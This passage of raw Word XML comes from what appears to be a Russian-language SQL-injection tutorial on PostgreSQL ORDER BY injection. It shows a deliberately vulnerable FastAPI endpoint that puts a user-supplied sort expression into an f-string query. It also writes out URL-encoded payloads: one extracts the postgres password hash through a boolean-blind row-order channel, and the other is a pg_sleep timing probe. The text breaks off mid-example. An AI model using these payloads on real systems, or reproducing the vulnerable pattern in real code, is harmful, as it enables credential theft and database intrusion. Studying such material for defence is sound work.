        <w:t xml:space="preserve"> — full expression-context, расширение Variant C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CFDFDF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CC369E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «SELECT» / «ORDER BY Clause» — https://www.postgresql.org/docs/current/sql-select.html#SQL-ORDERBY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F58259D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PostgreSQL Error Codes: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>22P01</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ORDER BY position invalid — https://www.postgresql.org/docs/current/errcodes-appendix.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A7C630" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PortSwigger: «SQL injection cheat sheet» (раздел «Determining the number of columns required») — https://portswigger.net/web-security/sql-injection/cheat-sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566AE438" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   OWASP: «SQL Injection Prevention Cheat Sheet» — https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC22ECE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   FastAPI Docs: «Path Parameters and Numeric Validations» — https://fastapi.tiangolo.com/tutorial/path-params-numeric-validations/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8A7557" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.14.4 ORDER BY (CASE WHEN ...) — full expression-context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C48902" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>arbitrary expression</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не только column-reference или column-number. Это означает, что любой user-input, попавший в ORDER BY-position через f-string или concat, — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>полноценная SQL injection в expression-context</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, эквивалентная injection в WHERE. Особенность ORDER BY-канала: ответом-индикатором служит не значение, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>порядок строк в response</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (CASE WHEN cond THEN col1 ELSE col2 END)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сортирует rows по разным колонкам в зависимости от boolean condition — атакующий сравнивает row order до/после и читает данные побитно. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>boolean-blind канал, нативно встроенный в ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Дополнительно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (CASE WHEN cond THEN pg_sleep(5) ELSE 1 END)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> создаёт conditional time-delay в sorting phase (3.4 time-channel через ORDER BY).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C8FC0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7A4EE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/reports.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71318EAA"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153B0A0B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FD0C42"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4ACC05A9"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1001FB64" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3715DA62" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C67BE23" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F62B12" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/reports/orders")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF09AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_orders(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F82741B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sort_expr: str = Query("created_at DESC"),  # ← полная свобода</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAD163B"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5D3AE153" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E30BCA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Антипаттерн: полная sort-expression от пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4807AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (например, для admin UI с custom sort: "amount DESC, created_at ASC")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495B094E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4480DB8A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id, customer_id, amount, status, created_at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E730DAF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE0B02A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE created_at &gt; now() - interval '90 days'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD320EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY {sort_expr}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA35D52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483FED3A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577CAD20"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650A8368"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5F60245D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Разработчик разрешил «complex sort» через user-input — типичный паттерн в admin-dashboards, где UI собирает sort-spec из нескольких колонок и направлений. Реальный mistake: не whitelist комбинаций, а свободный текст.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06600018" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Payload — три варианта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF0594F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант A — boolean-blind через row order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9EF534" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /reports/orders?sort_expr=(CASE%20WHEN%20(SELECT%20substring(rolpassword,1,1)%20FROM%20pg_authid%20WHERE%20rolname='postgres')='m'%20THEN%20amount%20ELSE%20created_at%20END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7331ACFF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort_expr = "(CASE WHEN (SELECT substring(rolpassword,1,1) FROM pg_authid WHERE rolname='postgres')='m' THEN amount ELSE created_at END)"</w:t>
      </w:r>
      <w:r>
        <w:t>. Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C69C0F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, customer_id, amount, status, created_at FROM orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055DDB2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE created_at &gt; now() - interval '90 days'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CADD3CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (CASE WHEN (SELECT substring(rolpassword,1,1) FROM pg_authid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A2DE0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                       WHERE rolname='postgres')='m'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2D6155" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">              THEN amount ELSE created_at END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FBADBC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1744AD16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если первый символ password от роли </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> равен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'m'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, sort происходит по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>amount</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (числовая колонка); иначе — по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>created_at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (timestamp). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Порядок ID-rows в response будет разным</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в этих двух случаях, и атакующий сравнивает первые 5–10 ID с known-good response — boolean confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B0E9C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атакующий итерирует: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>='a'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>='b'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ..., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>='m'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (true), сохраняет, переходит к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring(rolpassword,2,1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bitwise extraction password-а</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стандартная техника 3.3 (boolean-blind), просто канал — order вместо count rows. Требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SELECT — обычно только superuser, но password-hashing reverse-engineering начинается с этого канала.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E054764" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант B — time-based через pg_sleep в ORDER BY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B90A7D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /reports/orders?sort_expr=(CASE%20WHEN%20(SELECT%20rolsuper%20FROM%20pg_roles%20WHERE%20rolname=current_user)%20THEN%20pg_sleep(5)::text%20ELSE%20''%20END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478394C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort_expr = "(CASE WHEN ... THEN pg_sleep(5)::text ELSE '' END)"</w:t>
      </w:r>
      <w:r>
        <w:t>. Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEFA6E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (CASE WHEN (SELECT rolsuper FROM pg_roles WHERE rolname=current_user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE2DB7D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
